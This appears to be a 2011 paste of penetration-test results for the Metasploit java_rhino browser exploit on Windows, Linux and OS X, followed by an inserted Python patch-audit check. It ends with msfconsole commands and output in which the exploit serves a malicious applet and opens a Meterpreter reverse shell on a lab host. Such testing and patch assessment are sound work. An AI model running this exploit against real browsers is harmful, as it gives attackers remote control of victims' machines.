Untitled

a guest Nov 30th, 2011 436 Never
=============
TEST RESULTS:
=============

Below is a breakdown of the results of our java_rhino exploit testing on a variety of platforms. This vulnerability is particularly pernicious, as it is cross-platform, unpatched on some systems, and generally an easy-to-exploit client-side issue that does little to make the user aware they're being exploited.

Windows:
========

A Windows XP device was tested for vulnerability; a session could be generated in every browser when the system was running Java versions prior to the latest. Note that Chrome did prompt the user to let them know the Java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browsers prompted the user.

WinXP sp3 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP sp3 / firefox - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP sp3 / chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP sp3 / safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11

Linux:
======

Several Linux desktops were tested, one with the Sun Java plugin and another with the IcedTea plugin. The IcedTea Java plugin was determined to not be vulnerable, though it wasn't tested extensively and may still be vulnerable.

An attempt was made to update the Ubuntu 10.04 device, and the Java package was downloaded and linked to system Java. However, the plugin was not installed as part of this process, and thus, even though the device was running the latest (build 1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395.html

Chrome again prompted the user to alert them that Java was out of date. Firefox did not.

Ubuntu 10.04 LTS / firefox (sun java 1.6.0_26) - SESSION CREATED - no package available in the repositories
Ubuntu 10.04 LTS / chrome (sun java 1.6.0_26) - SESSION CREATED - no package available in the repositories
Ubuntu 11.10 / chrome (iced tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the iced tea plugin

OS X:
=====

Interesting issue here: I was forced to update, restart, then update again to get the updated Sun Java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus a second update was required to get the latest Java package. To be fair, this system hadn't been updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete.

OS X 10.6.6 / chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 / firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 / safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11

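The Ubuntu 10.04 result shows that an up-to-date system Java does not mean the browser plugin is up to date. The following is an added example, not part of the original paste: a patch-audit check that classifies hosts by the plugin's version against the 1.6.0_29 threshold from the results. The inventory records, field names and status labels are hypothetical.

```python
import re

# First build the test results above report as no longer exploitable.
FIXED = (1, 6, 0, 29)
_VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:_(\d+))?(?:-b\d+)?$")

def parse_java_version(text):
    """'1.6.0_29-b11' -> (1, 6, 0, 29); the -bNN build suffix is ignored."""
    m = _VERSION.match(text.strip())
    if not m:
        raise ValueError("unrecognised Java version: %r" % (text,))
    return tuple(int(g or 0) for g in m.groups())

def assess(host):
    """Classify one record by the browser plugin's version, not system Java."""
    plugin = host.get("plugin_version")
    if plugin is None:
        return "no-plugin"
    if host.get("plugin_vendor") != "sun":
        # IcedTea gave no session in the tests but was not tested extensively.
        return "untested-vendor"
    version = parse_java_version(plugin)
    if version[:3] != FIXED[:3]:
        return "out-of-scope"  # the results above only cover the 1.6.0 line
    if version >= FIXED:
        return "patched"
    system = host.get("system_version")
    if system and parse_java_version(system) >= FIXED:
        # The Ubuntu 10.04 case: system Java updated, plugin left behind.
        return "vulnerable-stale-plugin"
    return "vulnerable"

# Constructed inventory records (hypothetical hosts and field names).
INVENTORY = [
    {"name": "xp-desk", "plugin_vendor": "sun",
     "plugin_version": "1.6.0_26", "system_version": "1.6.0_26"},
    {"name": "lucid-desk", "plugin_vendor": "sun",
     "plugin_version": "1.6.0_26", "system_version": "1.6.0_29-b11"},
    {"name": "oneiric-desk", "plugin_vendor": "icedtea",
     "plugin_version": "1.6.0_23", "system_version": "1.6.0_23"},
    {"name": "mac-desk", "plugin_vendor": "sun",
     "plugin_version": "1.6.0_29-b11", "system_version": "1.6.0_29-b11"},
]

def report(inventory):
    """Map each host name to its status."""
    return {h["name"]: assess(h) for h in inventory}
```
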
=============
MODULE USAGE:
=============

msf  exploit(handler) > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > info
msf  exploit(java_rhino) > set URIPATH xxxx
msf  exploit(java_rhino) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on 10.0.0.11:4444
[*] Using URL: http://0.0.0.0:8080/xxxx
[*]  Local IP: http://10.0.0.11:8080/xxxx
[*] Server started.
msf  exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 10.0.0.10:1284...
[*] Sending Applet.jar to 10.0.0.10:1288...
[*] Sending Applet.jar to 10.0.0.10:1288...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 10.0.0.10:1289...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 10.0.0.10:1290...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 10.0.0.10:1291...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 10.0.0.10:1292...
[*] Sending stage (28469 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.11:4444 -> 10.0.0.10:1293) at 2011-11-29 22:25:33 -0600